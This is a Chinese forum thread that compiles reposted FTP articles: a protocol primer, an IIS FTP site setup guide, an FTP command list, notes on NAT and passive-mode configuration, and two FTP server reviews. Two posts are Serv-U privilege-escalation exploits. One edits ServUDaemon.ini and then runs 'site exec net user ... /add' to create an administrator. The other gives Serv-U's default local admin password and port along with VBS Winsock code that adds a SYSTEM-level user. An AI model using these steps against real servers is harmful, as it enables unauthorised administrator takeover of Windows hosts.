chouqiu 2008-4-11 20:42
FtpServer的一些知识
[b]什么是FTP及什么是FTP服务器[/b]
[wiki]FTP[/wiki](File Transfer Protocol)是文件传输协议的简称。
FTP的作用
正如其名所示:FTP的主要作用,就是让用户连接上一个远程计算机(这些计算机上运行着FTP[wiki]服务器[/wiki]程序)察看远程计算机有哪些文件,然后把文件从远程计算机上拷到本地计算机,或把本地计算机的文件送到远程计算机去。
FTP工作原理
拿下传文件为例,当你启动FTP从远程计算机拷贝文件时,你事实上启动了两个程序:一个本地机上的FTP客户程序:它向FTP服务器提出拷贝文件的请求。另一个是启动在远程计算机的上的FTP服务器程序,它响应你的请求把你指定的文件传送到你的计算机中。FTP采用“客户机/服务器”方式,用户端要在自己的本地计算机上安装FTP客户程序。FTP客户程序有字符界面和图形界面两种。字符界面的FTP的命令复杂、繁多。图形界面的FTP客户程序,操作上要简洁方便的多。
简单地说,支持FTP协议的服务器就是FTP服务器,下面介绍一下什么是FTP协议(文件传输协议)
一般来说,用户联网的首要目的就是实现信息共享,文件传输是信息共享非常重要的一个内容之一。Internet上早期实现传输文件,并不是一件容易的事,我们知道 Internet是一个非常复杂的计算机环境,有PC,有工作站,有MAC,有大型机,据统计连接在Internet上的计算机已有上千万台,而这些计算机可能运行不同的操作系统,有运行[wiki]Unix[/wiki]的服务器,也有运行Dos、Windows的PC机和运行[wiki]Mac[/wiki]OS的苹果机等等,而各种操作系统之间的文件交流问题,需要建立一个统一的文件传输协议,这就是所谓的FTP。基于不同的操作系统有不同的FTP应用程序,而所有这些应用程序都遵守同一种协议,这样用户就可以把自己的文件传送给别人,或者从其它的用户环境中获得文件。
与大多数Internet服务一样,FTP也是一个客户机/服务器系统。用户通过一个支持FTP协议的客户机程序,连接到在远程主机上的FTP服务器程序。用户通过客户机程序向服务器程序发出命令,服务器程序执行用户所发出的命令,并将执行的结果返回到客户机。比如说,用户发出一条命令,要求服务器向用户传送某一个文件的一份拷贝,服务器会响应这条命令,将指定文件送至用户的机器上。客户机程序代表用户接收到这个文件,将其存放在用户目录中。
在FTP的使用当中,用户经常遇到两个概念:"下载"(Download)和"上载"(Upload)。"下载"文件就是从远程主机拷贝文件至自己的计算机上;"上载"文件就是将文件从自己的计算机中拷贝至远程主机上。用Internet语言来说,用户可通过客户机程序向(从)远程主机上载(下载)文件。
使用FTP时必须首先登录,在远程主机上获得相应的权限以后,方可上载或下载文件。也就是说,要想同哪一台计算机传送文件,就必须具有哪一台计算机的适当授权。换言之,除非有用户ID和口令,否则便无法传送文件。这种情况违背了Internet的开放性,Internet上的FTP主机何止千万,不可能要求每个用户在每一台主机上都拥有帐号。匿名FTP就是为解决这个问题而产生的。
匿名FTP是这样一种机制,用户可通过它连接到远程主机上,并从其下载文件,而无需成为其注册用户。系统管理员建立了一个特殊的用户ID,名为anonymous, Internet上的任何人在任何地方都可使用该用户ID。
通过FTP程序连接匿名FTP主机的方式同连接普通FTP主机的方式差不多,只是在要求提供用户标识ID时必须输入anonymous,该用户ID的口令可以是任意的字符串。习惯上,用自己的E-mail地址作为口令,使系统维护程序能够记录下来谁在存取这些文件。
值得注意的是,匿名FTP不适用于所有Internet主机,它只适用于那些提供了这项服务的主机。
当远程主机提供匿名FTP服务时,会指定某些目录向公众开放,允许匿名存取。系统中的其余目录则处于隐匿状态。作为一种安全措施,大多数匿名FTP主机都允许用户从其下载文件,而不允许用户向其上载文件,也就是说,用户可将匿名FTP主机上的所有文件全部拷贝到自己的机器上,但不能将自己机器上的任何一个文件拷贝至匿名FTP主机上。即使有些匿名FTP主机确实允许用户上载文件,用户也只能将文件上载至某一指定上载目录中。随后,系统管理员会去检查这些文件,他会将这些文件移至另一个公共下载目录中,供其他用户下载,利用这种方式,远程主机的用户得到了保护,避免了有人上载有问题的文件,如带病毒的文件。
作为一个Internet用户,可通过FTP在任何两台Internet主机之间拷贝文件。但是,实际上大多数人只有一个Internet帐户,FTP主要用于下载公共文件,例如共享软件、各公司技术支持文件等。 Internet上有成千上万台匿名FTP主机,这些主机上存放着数不清的文件,供用户免费拷贝。实际上,几乎所有类型的信息,所有类型的计算机程序都可以在Internet上找到。这是Internet吸引我们的重要原因之一。
匿名FTP使用户有机会存取到世界上最大的信息库,这个信息库是日积月累起来的,并且还在不断增长,永不关闭,涉及到几乎所有主题。而且,这一切是免费的。
匿名FTP是Internet网上发布软件的常用方法。Internet之所以能延续到今天,是因为人们使用通过标准协议提供标准服务的程序。像这样的程序,有许多就是通过匿名FTP发布的,任何人都可以存取它们。
Internet中的有数目巨大的匿名FTP主机以及更多的文件,那么到底怎样才能知道某一特定文件位于哪个匿名FTP主机上的那个目录中呢?这正是Archie服务器所要完成的工作。Archie将自动在FTP主机中进行搜索,构造一个包含全部文件目录信息的[wiki]数据库[/wiki],使你可以直接找到所需文件的位置信息。
chouqiu 2008-4-11 20:44
Serv-U FTP Server远程/本地提升权限缺陷
本地提升权限:是
远程提升权限:是
使用前提条件:对Serv-U配置文件有修改权限
声明:这只是一个提升权限的思路和方法。
一、受影响的软件
Serv-U FTP Server 4.1.0.9 (以及以前所有版本)
二、受影响系统
Microsoft Windows Server 2003 所有版本
Microsoft Windows XP 所有版本
Microsoft Windows 2000 所有版本
Microsoft Windows NT 所有版本
三、综述
Serv-U FTP Server为RhinoSoft出品的一款Ftp Sserver软件,目前在全世界广为使用。经我研究发现,Serv-U FTP Server的配置文件存贮于Serv-U FTP Server文件目录下的ServUDaemon.ini文件中。如果本地受限用户或者远程拥有普通权限的攻击者能接触到该文件并精心构造ServUDaemon.ini文件中的内容就能利用Ftp进程在系统上以SYSTEM权限执行任意命令。
四、缺陷分析:
Serv-U FTP Serve在设置用户以后会把配置信息存储与ServUDaemon.ini文件中。包括用户的权限信息和可访问目录信息。本地受限用户或者是远程攻击者只要能够读写Serv-U FTP Serve的文件目录,就可以通过修改目录中的ServUDaemon.ini文件实现以Ftp进程在远程、本地系统上以FTP系统管理员权限来执行任意命令。并且不受系统版本的影响。(用户信息选择“存储与系统注册表中”不受此缺陷影响)
五、测试方法:
1、本地测试
假设本地受限用户可以浏览Serv-U FTP Serve的文件目录。找到ServUDaemon.ini文件。用记事本打开原文件大致内容为:
[GLOBAL]
Version=4.1.0.0 // Serv-U Ftp Server 版本号
ProcessID=584
RegistrationKey=UEyz459waBR4lVRkIkh4dYw9f8v4J/AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo+wAGnUBuycB
[DOMAINS]
Domain1=127.0.0.1||21|127.0.0.1|1|0 //主机IP以及域名,端口情况
[Domain1]
User1=zihuan|1|0
[USER=zihuan|1]
Password=rfE8DFBE3F7EC27FB043D4305A04E6D2C6
HomeDir=c:\ // 可以浏览的目录
TimeOut=600
Access1=C:\|RWAMLCDP
如果把ServUDaemon.in文件修改为:
[GLOBAL]
Version=4.1.0.0
ProcessID=584
RegistrationKey=UEyz459waBR4lVRkIkh4dYw9f8v4J/AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo+wAGnUBuycB
[DOMAINS]
Domain1=127.0.0.1||21|127.0.0.1|1|0
[Domain1]
User1=zihuan|1|0
[USER=zihuan|1]
Password=rfE8DFBE3F7EC27FB043D4305A04E6D2C6
HomeDir=c:\
TimeOut=600
Maintenance=System //权限类型
Access1=C:\|RWAMELCDP
以上内容比原内容多了一句“Maintenance=System”修改完成后保存。然后在用Ftp登陆到Serv-U FTP Server以后执行如下命令:
ftp>open ip
Connected to ip.
220 Serv-U FTP Server v4.1.0.0 for WinSock ready...
User (ip:(none)): id //输入构造的用户
331 User name okay, please send complete E-mail address as password.
Password:password //密码
230 User logged in, proceed.
ftp> cd winnt //进入win2k的winnt目录,如果是winxp或者是windows server 2003就应该为windows目录。
250 Directory changed to /WINNT
ftp>cd system32 //进入system32目录
250 Directory changed to /WINNT/system32
ftp>quote site exec net.exe user zihuan ziHUAN /add //利用系统的net.exe文件加用户。
200 EXEC command successful (TID=33).
ftp>quote site exec net.exe localhost administrators zihuan /add //提升为超级用户
这样就在本地系统上加了一个为zihuan密码为:ziHUAN的超级用户。也可以直接用quote site exec net.exe localhost administrators user /add命令把当前用户提升到超级用户组中去。当然也可以在系统上执行任何命令。
声明:
本本仅用来描述可能存在的安全问题,作者本人和黑客X档案杂志社不为此安全公告提供任何保证或承诺。由于传播、利用此文章提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任。作者拥有对此安全公告的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者本人允许,不得任意修改或者增减此文章公告内容。
chouqiu 2008-4-11 20:46
FTP的建立与维护
[table=548][tr][td][b]1、创建新的FTP站点
[/b] 执行[开始]→[程序]→[管理工具]→[Internet服务器管理器]命令,打开“Internet信息服务”对话框。
用鼠标右键单击服务器节点,从弹出的快捷菜单中选择[新建]→[FTP站点]命令,打开“欢迎使用FTP站点创建向导”对话框,然后单击[下一步]按钮,弹出“FTP站点说明”对话框,在“说明”文本框中输入站点的说明文字,比如“FTP下载站点”,然后单击[下一步]按钮(如图1)。
[img]http://edu.admin5.com/upimg/allimg/070109/1500490.jpg[/img]
打开“[wiki]IP地址[/wiki]和端口设置”对话框,在“输入FTP站点使用的IP地址”下拉列表中选择或者直接输入IP地址,并设定[wiki]TCP[/wiki]端口的值为“21”,单击[下一步]按钮继续(如图2)。
[img]http://edu.admin5.com/upimg/allimg/070109/1500491.jpg[/img]
弹出“FTP站主目录”对话框,在“路径”文本框中输入主目录的路径,然后单击[下一步]按钮(如图3)。
[img]http://edu.admin5.com/upimg/allimg/070109/1500492.jpg[/img]
打开“FTP站点访问权限”对话框,FTP站点只有两种访问权限:读取和写入。前者对应下载权限,后者对应上传权限,单击[下一步]继续(如图4)。在最后弹出的对话框中单击[完成]按钮,完成站点的创建。
[img]http://edu.admin5.com/upimg/allimg/070109/1500493.jpg[/img]
[b]2、创建虚拟目录[/b]
主目录是存储站点文件的主要位置,虚拟目录以在主目录中映射文件夹的形式存储数据,可以更好地拓展FTP服务器的存储能力。
用鼠标右键单击要建立虚拟目录的FTP站点,在弹出菜单中选择[新建]→[虚拟目录]命令。
打开虚拟目录创建向导并单击[下一步]按钮,在“虚拟目录别名”对话框中的“别名”文本栏中指定虚拟目录别名,比如“资料下载”(如图5)。
[img]http://edu.admin5.com/upimg/allimg/070109/1500494.jpg[/img]
在“FTP站点内容目录”对话框中单击[浏览]按钮设定虚拟目录所对应的实际路径(如图6)。
[img]http://edu.admin5.com/upimg/allimg/070109/1500495.jpg[/img]
在“访问权限”对话框中,设定虚拟目录允许的用户访问权限,可以选择“读取”或“写入”权限,并单击[下一步]按钮完成虚拟目录的设置。
同样道理,我们还可以创建一个名为“资料上传”的虚拟目录。在[wiki]IIS[/wiki]管理界面中,单击展开FTP站点,可以找到刚才新建的虚拟目录(如图7)。
[img]http://edu.admin5.com/upimg/allimg/070109/1500496.jpg[/img]
[b]3、站点的维护与管理[/b]
查看连接用户
右键单击FTP站点,从弹出菜单中选择“属性”命令,打开“FTP站点”选项卡。在这里可以对站点说明、IP地址和TCP端口号等内容进行配置。同时,在“连接”中可以设定同时连接到该站点的最大并发连接数(如图8)。
[img]http://edu.admin5.com/upimg/allimg/070109/1500497.jpg[/img]
单击[当前用户]按钮,打开“FTP用户会话”对话框,在这里可以查看当前连接到FTP站点的用户列表,从列表中选择用户,单击[断开]断开当前用户的连接(如图9)。
[img]http://edu.admin5.com/upimg/allimg/070109/1500498.jpg[/img]
设定FTP站消息
FTP站点消息分为三种:欢迎、退出、最大连接数。在“消息”选项卡可以分别设定,“欢迎消息”用于向每一个连接到当前站点的访问者介绍本站点的信息,“退出消息”用于在客户断开连接时发送给站点访问者的信息,“最大连接数消息”用于在系统同时连接数达到上限时,向请求连接站点的新访问者发出的提示消息,完成后单击[确定]按钮(如图10)。
[img]http://edu.admin5.com/upimg/allimg/070109/1500499.jpg[/img]
配置匿名登录
右键单击FTP站点,从弹出菜单中选择“属性”命令,单击选择“安全账号”选项卡。在默认状态下,当前站点是允许匿名访问的。
在这里如果选择“允许匿名连接”选项,那么FTP服务器将提供匿名登录服务。
如果选择“只允许匿名登录”选项,则可以防止使用有管理权限的账号进行访问,即便是Administrator(管理员)账号也不能登录,从而可以加强FTP服务器的安全管理(如图11)。
[img]http://edu.admin5.com/upimg/allimg/070109/15004910.jpg[/img]
修改主目录文件夹
选择“主目录”选项卡,在这里可以使用“主目录”属性表改变FTP站点的主目录并修改其属性。单击[浏览]按钮,改变FTP站点的主目录文件夹存储的位置。如果打算改变主目录读写权限改变,可以选择是否允许“读取”和“写入”权限。为了更加进一步保障服务器的安全,建议选择“日志访问”选项,这样就可以同步记录FTP站点上的操作,从而便于在服务器发生故障的时候,及时打开日志文件检查故障的发生情况(如图12)。
[img]http://edu.admin5.com/upimg/allimg/070109/15004911.jpg[/img]
安全访问
单击选择“目录安全性”选项卡,在这里可以通过限制某些IP地址来控制访问FTP服务器的计算机。选择“授予访问”或“拒绝访问”选项,可以用来调整如何处理这些IP地址,单击[添加]按钮可以进行IP 地址的添加操作,从而可以控制来自安全的IP地址的访问(如图13)。
[img]http://edu.admin5.com/upimg/allimg/070109/15004912.jpg[/img]
[b]4、访问FTP服务器[/b]
下面来测试一下FTP服务器是否已经正常工作了。
首先在f:\inetpub\ftproot文件夹中加入一个名为Pic.bmp的文件
启动Cutftp,配置好FTP站点的属性,然后单击[Connect]按钮连接FTP站点(如图14)。
[img]http://edu.admin5.com/upimg/allimg/070109/15004913.jpg[/img]
弹出一个欢迎登录对话框,单击[OK]按钮结束,即可打开FTP主站点目录,此时即可实现上传与下载任务(如图15)。
[img]http://edu.admin5.com/upimg/allimg/070109/15004914.jpg[/img][/td][/tr][/table]
chouqiu 2008-4-11 20:47
Serv-u6.0提权新招
适用环境:服务器禁用FSO,关掉Wscript.shelll,没有执行权限。
限制:没有更改管理员的密码,或者破解出了Serv-U的管理员的密码。Serv-U默认用户名:localadministrator 密码:#|@$ak#.|k;0@p 下面用MSWinsock。Winsock建立一个连接,并且以System权限添加超级用户,代码如下:
Dim revdata
Dim sendata
Set sock=createobject("MSWinsock.Winsock")
Sock.protocol=0
Sock.connect "127.0.0.1",43958
Sendata="LocalAdministrator"& chr(10) &chr(13)
Sock.senddata snedata
Sendata="#|@$ak#.|k;0@p" &chr(10) &chr(13)
Sock.senddata.sendata
使用这个代码就可以连上FTP了,接下来用Sock.senddata sendata 发送添加有执行权限用户的命令,想必大家该知道怎么做了吧,对了,就是用"site exec net user hacker hacker /add" "site exec net localgroup administrators
chouqiu 2008-4-11 20:48
ftp使用经典
[color=#ffffff][/color]FTP命令是Internet用户使用最频繁的命令之一,不论是在DOS还是UNIX操作系统下使用FTP,都会遇到大量的FTP内部命令。 熟悉并灵活应用FTP的内部命令,可以大大方便使用者,并收到事半功倍之效。
FTP的命令行格式为: ftp -v -d -i -n -g [主机名] ,其中 -v 显示远程服务器的所有响应信息;
-n 限制ftp的自动登录,即不使用;
.n etrc文件;
-d 使用调试方式;
-g 取消全局文件名。
ftp使用的内部命令如下(中括号表示可选项):
1.![cmd[args}:在本地机中执行交互shell,exit回到ftp环境,如:!ls*.zip.
2.$ macro-ame[args]:执行宏定义macro-name.
3.account[password]:提供登录远程系统成功后访问系统资源所需的补充口令。
4.append local-file[remote-file]:将本地文件追加到远程系统主机,若未指定远程系统文件名,则使用本地文件名。
5.ascii:使用ascii类型传输方式。
6.bell:每个命令执行完毕后计算机响铃一次。
7.bin:使用二进制文件传输方式。
8.bye:退出ftp会话过程。
9.case:在使用mget时,将远程主机文件名中的大写转为小写字母。
10.cd remote-dir:进入远程主机目录。
11.cdup:进入远程主机目录的父目录。
12.chmod mode file-name:将远程主机文件file-name的存取方式设置为mode,如: chmod 777 a.out 。
13.close:中断与远程服务器的ftp会话(与open对应)。
14.cr:使用asscii方式传输文件时,将回车换行转换为回行。
15.delete remote-file:删除远程主机文件。
16.debug[debug-value]:设置调试方式, 显示发送至远程主机的每条命令,如: deb up 3,若设为0,表示取消debug。
17.dir[remote-dir][local-file]:显示远程主机目录,并将结果存入本地文件local-file。
18.disconnection:同close。
19.form format:将文件传输方式设置为format,缺省为file方式。
20.get remote-file[local-file]: 将远程主机的文件remote-file传至本地硬盘的local-file。
21.glob:设置mdelete,mget,mput的文件名扩展,缺省时不扩展文件名,同命令行的-g参数。
22.hash:每传输1024字节,显示一个hash符号(#)。
23.help[cmd]:显示ftp内部命令cmd的帮助信息,如:help get。
24.idle[seconds]:将远程服务器的休眠计时器设为[seconds]秒。
25.image:设置二进制传输方式(同binary)。
26.lcd[dir]:将本地工作目录切换至dir。
27.ls[remote-dir][local-file]:显示远程目录remote-dir, 并存入本地文件local-file。
28.macdef macro-name:定义一个宏,遇到macdef下的空行时,宏定义结束。
29.mdelete[remote-file]:删除远程主机文件。
30.mdir remote-files local-file:与dir类似,但可指定多个远程文件,如: mdir *.o.*.zipoutfile 。
31.mget remote-files:传输多个远程文件。
32.mkdir dir-name:在远程主机中建一目录。
33.mls remote-file local-file:同nlist,但可指定多个文件名。
34.mode[modename]:将文件传输方式设置为modename, 缺省为stream方式
35.modtime file-name:显示远程主机文件的最后修改时间。
36.mput local-file:将多个文件传输至远程主机。
37.newer file-name: 如果远程机中file-name的修改时间比本地硬盘同名文件的时间更近,则重传该文件。
38.nlist[remote-dir][local-file]:显示远程主机目录的文件清单,并存入本地硬盘的local-file。
39.nmap[inpattern outpattern]:设置文件名映射机制, 使得文件传输时,文件中的某些字符相互转换,如:nmap $1.$2.$3[$1,$2].[$2,$3],则传输文件a1.a2.a3时,文件名变为a1,a2。该命令特别适用于远程主机为非UNIX机的情况。
40.ntrans[inchars[outchars}:设置文件名字符的翻译机制,如ntrans1R,则文件名LLL将变为RRR。
41.open host[port]:建立指定ftp服务器连接,可指定连接端口。
42.passive:进入被动传输方式。
43.prompt:设置多个文件传输时的交互提示。
44.proxy ftp-cmd:在次要控制连接中,执行一条ftp命令, 该命令允许连接两个ftp服务器,以在两个服务器间传输文件。第一条ftp命令必须为open,以首先建立两个服务器间的连接。
45.put local-file[remote-file]:将本地文件local-file传送至远程主机
46.pwd:显示远程主机的当前工作目录。
47.quit:同bye,退出ftp会话。
48.quote arg1,arg2...:将参数逐字发至远程ftp服务器,如:quote syst.
49.recv remote-file[local-file]:同get。
50.reget remote-file[local-file]:类似于get,但若local-file存在,则从上次传输中断处续传。
51.rhelp[cmd-name]:请求获得远程主机的帮助。
52.rstatus[file-name]:若未指定文件名,则显示远程主机的状态,否则显示文件状态。
53.rename[from][to]:更改远程主机文件名。
54.reset:清除回答队列。
55.restart marker:从指定的标志marker处,重新开始get或put,如:restart 130。
56.rmdir dir-name:删除远程主机目录。
57.runique:设置文件名唯一性存储,若文件存在,则在原文件后加后缀..1,.2等。
58.send local-file[remote-file]:同put。
59.sendport:设置PORT命令的使用。
60.site arg1,arg2...:将参数作为SITE命令逐字发送至远程ftp主机。
61.size file-name:显示远程主机文件大小,如:site idle 7200。
62.status:显示当前ftp状态。
63.struct[struct-name]:将文件传输结构设置为struct-name, 缺省时使用stream结构。
64.sunique:将远程主机文件名存储设置为唯一(与runique对应)。
65.system:显示远程主机的操作系统类型。
66.tenex:将文件传输类型设置为TENEX机的所需的类型。
67.tick:设置传输时的字节计数器。
68.trace:设置包跟踪。
69.type[type-name]:设置文件传输类型为type-name,缺省为ascii,如:
type binary,设置二进制传输方式。
70.umask[newmask]:将远程服务器的缺省umask设置为newmask,如:umask3。
71.user user-name[password][account]:向远程主机表明自己的身份,需要口令时,必须输入口令,如:user anonymous my@email。
72.verbose:同命令行的-v参数,即设置详尽报告方式,ftp服务器的所有响应都将显示给用户,缺省为on.
73.?[cmd]:同help.
chouqiu 2008-4-11 20:49
内网FTP服务器架设不完全解析
首先要提到的是这里的内网是指一般我们网吧内部环境的内网,对局域网内网我没什么好说的,愿花钱的去[wiki]DNS[/wiki]0755好了。一个基本条件:一个公网[wiki]IP[/wiki],对网关有操作权限。 FTP服务器端192.168.0.100,我选用Win2K+Serv-U 4.1.0.0,很普通常用的一个组合网关是最简单的双网卡PC,一接外网一接内网,这里假设外网IP为218.4.218.4,内网IP为192.168.0.1。
提一些概念性的东东:
一次完整的FTP会话,包含有两个连接,一个称之为命令通道,一个称之为数据通道。命令通道用来传递一些"命令"和反馈,包括用户名密码登陆,而且众所周知是明文数据通道用来传递实际数据----列目录、文件传输,一旦需要列目录或文件传输,数据通道就会被建立起来,这里分两种方式,一是PORT二是PASV。
你会在因特网上找到许多FTP服务器,有的要么只支持PORT,有的要么只支持PASV,有的是因为考虑安全因素,有的是因为条件限制等等。我想把我的FTP做成PORT和PASV方式都能支持的,这样不会使客户端在连接上受到困扰,特别是一些新手,对于PORT和PASV的定义,比较容易理解的解释是针对FTP服务端而言的:
PORT是主动模式,在建立数据通道时,服务端去连接别人;
PASV是被动模式,在建立数据通道时,服务端被别人连接;
建立数据通道时,用PORT模式还是PASV模式,选择权在于FTP客户端。
现在要做的,就是端口映射了,最基本的是命令通道的映射,这里选用默认的21,我想把在网关外网接口收到的对218.4.218.4端口21的连接请求,转发到192.168.0.100的21端口去。
[b]Win2K网关[/b]
系统自带简单的端口转发程序,就是能给我们提供连接共享的ICS/RRAS,这两种方式原理是一样的,而且都能提供这类业务的端口转发设置过程比较简单,我也不抓图了,以前有过很多。
就是在"服务与端口"中,注册一条类似"公用网络与端口218.4.218.4:21 To 专用网络与端口192.168.0.100:21"这样格式的规则设置好后,别人就能访问你的内网FTP服务器了,但你很快会发现你的FTP服务器只支持PORT方式,如果客户端也在内网环境则PORT方式也用不了了这是为什么呢?我们来分析一下,因为在PASV方式,服务器接到客户端的PASV命令后,会指定一个本地的随机端口来作为PASV端口,并通知客户端,然后等待客户端的连接,在通知消息里包含有FTP服务器的IP地址和打开的PASV端口,我FTP服务器的IP地址是什么?
现在是192.168.0.100,那么对方收到的PASV通知将是这样格式的227 Entering Passive Mode (192,168,0,100,m,n)mn是定义了PASV端口的值,计算方式是m*256+m,如果这里m是10而n是20,那么PASV端口就是2580客户端收到这条通知后,当它想发起数据通道的连接,它会向192.168.0.100:2580这个目标地址发送SYN请求,毫无疑问将不会收到应答,因为这个IP在公共网络事实上是不存在的解决的办法是让FTP服务器发送带公网IP的PASV通知,我们的Serv-U支持这个功能。
[align=center] [img]http://edu.admin5.com/upimg/allimg/070109/1447420.jpg[/img][/align] 然后在网关上把需要打开的PASV端口跟21端口一样做映射到192.168.0.100
你也许会疑惑了,PASV是服务器动态打开的随机端口,我怎么会知道它会用哪个?怎么映射啊?没有问题,Serv-U同样可以定义每次使用固定的PASV端口,当然为了同时承接多个连接会话,你需要多设置几个成一段,然后在网关上一一对应映射到FTP服务器上去,图中设置了20个。
[align=center][img=532,385]http://edu.admin5.com/upimg/allimg/070109/1447422.jpg[/img][/align]
chouqiu 2008-4-11 20:50
BulletProof FTP Server:物美价廉
BulletProof FTP Server,曾经的名字是G6 FTP Server,是一款全功能的Windows平台FTP服务器软件。 如果你的组织需要一款Windows平台的简单FTP服务器,你会有很多选择。不过如果你想找到一款全功能适用于中端到高端用户使用的windows 平台FTP服务器,你可以好好看一下BulletProof FTP Server这个产品。它并不向一些其它的FTP服务器那样在服务器里整合进其它一些如telnet或IRC等的协议,BulletProof FTP Server的作者专注于FTP服务本身,尽可能实现一个用户有可能对一个FTP服务器提出的各种要求。当然,在一个软件里包括更多的功能特性的确可以提高软件的价值,不过太多的功能如果不能和强大的界面相配合的话,可能会造成软件的使用困难。好在,BulletProof FTP Serve在两方面都做得很好。
你可以在BulletProof FTP Server的主页上下载这个产品的测试版,安装文件包括了说明文件和一些插件共2.33M,在安装过程中你可以选择是否安装各个部分,测试版的使用时限为30天,而且对每个FTP连接的上传和下载数目也有限制。
[align=center][img=498,366]http://edu.admin5.com/upimg/allimg/070109/1446570.jpg[/img][/align] 你可以从setup菜单访问服务器的主设置页面,服务器把各种设置选项按树状进行了组织,除了一些典型的FTP设置外,还对服务器的行为控制提供了大量选项,例如,你可以设置是否自动删除未完成的上载文件,对密码加密,对用户并发连接的数目限制与重试/锁定/阻止等行为。在高级设置选项里你还可以修改服务器的缓存大小,启用攻击检测和阻止服务器到服务器传输(flashFXP之类的客户端使用)。另外还有大量定制日志文件的内容和格式的选项。如果你的机器有多个IP,也可以为服务器绑定多个IP。
[align=center][img=493,426]http://edu.admin5.com/upimg/allimg/070109/1446572.jpg[/img][/align] BulletProof FTP Server通过标准的用户和用户组模型来控制用户访问。你可以很简单的创建新用户,为其指定密码和一个可选的用户组。在用户设置界面里,你可以方面的访问各种用户相关的参数,指定用户的文件访问权限,磁盘配额等。你也可以简单的启用戓禁用某个用户而无需修改任何用户账户参数。管理员可以为用户账户附加一个文本的注释以便于管理,还可以快速的看到用户最新的连接和活动情况。
[align=center][img=510,459]http://edu.admin5.com/upimg/allimg/070109/1446574.jpg[/img][/align][align=center]BulletProof FTP Server有强大的性能监测工具。默认的,实时的服务器动态会显示在服务器的主窗口中,你也可以通过设置关闭这个选项。你还可以在其它几个地方查看服务器的实时动态,Hit-O-Meter窗口可以显示对某个文件的点击数,Statistics窗口显示出服务器各种流量的统计信息。另外还可以查看磁盘上的日志文件。总之,BulletProof FTP Server有足够的工具来监测它的用户和服务器本身。 [/align]
[align=center][size=3][img=472,333]http://edu.admin5.com/upimg/allimg/070109/1446576.jpg[/img][/size][/align][align=center][size=3][img]http://edu.admin5.com/upimg/allimg/070109/1446578.jpg[/img][/size][/align][align=left] BulletProof FTP Server的事件管理器是一个很体贴的功能,可以让管理员选择预定义的事件并定制服务器的事件提示信息。例如,你可以选择"OnWelcomeUser,"事件并定制当用户登入时的欢迎信息或选择"OnTooManyUsers,"事件来定制当连接用户过多时的提示。除了可以定义提示信息,你还可以通过它定义在特定事件发生后发出指定声音或启动外部程序。不过你不能添加新的事件类型,而且事件是全局范围而非用户范围的。事件管理器可以在特定事件发生时自动提示用户而无需管理员随时监测服务器。[/align][align=center][img=444,446]http://edu.admin5.com/upimg/allimg/070109/14465710.jpg[/img][/align] 总的说来,BulletProof FTP Server功能强大,界面直观。如果非要吹毛求疵的寻找它的缺点,那就是它的英文帮助文档的语法比较糟糕,读起来让人容易产生误解。这款产品的价格为34.95美元,如果同时购买多个许可证还可享受折扣。它的升级政策是主版本号不变时免费升级,当升级主版本号时享受50%的折扣。虽然它的一些功能在免费的[wiki]开源[/wiki]FTP服务器上也能找到,但它的高可设置性和直观的使用界面会让你觉得付出的金钱物有所值。
优点:强大的功能,高可设置性,直观的使用界面,可以接受的价格。
缺点:有时界面刷新有点慢,英文文档有点粗糙。
[table][tr][td=2,1][align=center][size=2]版本情况[/size][/align][/td][/tr][tr][td=1,1,65][size=2]最新版本[/size][/td][td=1,1,273][size=2]2.4.0.31 [/size][/td][/tr][tr][td=1,1,65][size=2]发布日期[/size][/td][td=1,1,273][size=2]2005年3月22日[/size][/td][/tr][tr][td=1,1,65][size=2]得分
(满分5) [/size][/td][td=1,1,273][size=2]4[/size][/td][/tr][tr][td=1,1,65][size=2]描述[/size][/td][td=1,1,273][size=2]全功能的FTP服务器[/size][/td][/tr][tr][td=1,1,65][size=2]下载[/size][/td][td=1,1,273][size=2][color=#314150]http://www.bpftpserver.com/download.php[/color][/size][/td][/tr][tr][td=1,1,65][size=2]平台[/size][/td][td=1,1,273][size=2]Alpha, Intel, Pentium [/size][/td][/tr][tr][td=1,1,65][size=2]操作系统[/size][/td][td=1,1,273][size=2]Windows NT 4.0, Windows 95/98, Windows 2000 [/size][/td][/tr][tr][td=1,1,65][size=2]价格[/size][/td][td=1,1,273][size=2]34.95美元,有免费的测试版本[/size][/td][/tr][tr][td=1,1,65][size=2]公司[/size][/td][td=1,1,273][size=2][color=#314150]BPFTP Server [/color][/size][/td][/tr][tr][td=1,1,65][size=2]主页[/size][/td][td=1,1,273][size=2][color=#314150]http://www.bpftpserver.com/index.php[/color][/size][/td][/tr][/table][table=500][size=2][size=+0][b]服务器特性[/b] [/size][/size][tr][td][size=2][size=+0][b]管理[/b]
图形界面设置
国形界面安装
远程管理
SNMP 管理/监控
[b]可扩展性/一些前瞻性的特性[/b]
.Net技术兼容
可移植到64位系统
支持集群
支持IPv6
J2EE 1.4认证
J2EE 1.4兼容t
[b]其它特性[/b]
多日志
支持Microsoft ISAPI
虚拟服务器
基于WEB的用户界面
[b]编程/脚本[/b]
包含源文件
有自己的API
自己的脚本语言/批处理语言
支持外部脚本/批处理语言
[/size][/size][/td][td][size=2][size=+0][b]安全[/b]
基于ActiveDirectory的认证
反垃圾邮件特性
反病毒特性
内置[wiki]防火墙[/wiki]能力
内置的[wiki]代理服务器[/wiki]能力
内建的用户访问控制机制
基于LDAP的认证
其它/系统认证
SSL (硬件)
SSL (软件)
[b]服务支持[/b]
可获得商业支持
论坛支持
免费电话支持
GSA scheduled
邮件列表支持[/size][/size][/td][/tr][/table]
chouqiu 2008-4-11 20:51
ArGoSoft FTP服务器:架设只要一分钟
[table=548][tr][td]ArGoSoft FTP Server是一款Windows平台下的FTP服务器,它除了支持全部的基本FTP命令外,还支持丰富的扩展功能。这些扩展功能特性包括被动模式支持,文件断点续传、指向其它文件、文件夹或驱动器(包括网络驱动器)的Windows快捷方式,虚拟域、IP过滤、改变文件系统的时间戳以及一些基于特定站点的命令(例如压缩和复制服务器上的文件)。 ArGoSoft FTP Serve并不限制服务器的用户数目,你可以为不同的用户针对不同目录指定不同的访问权限,并指定是否允许匿名访问,整个工作非常简单。
这个服务器也提供了两个自动化对象。如果你是一个开发者,你可以使用自己的程序来管理用户和控制服务器。
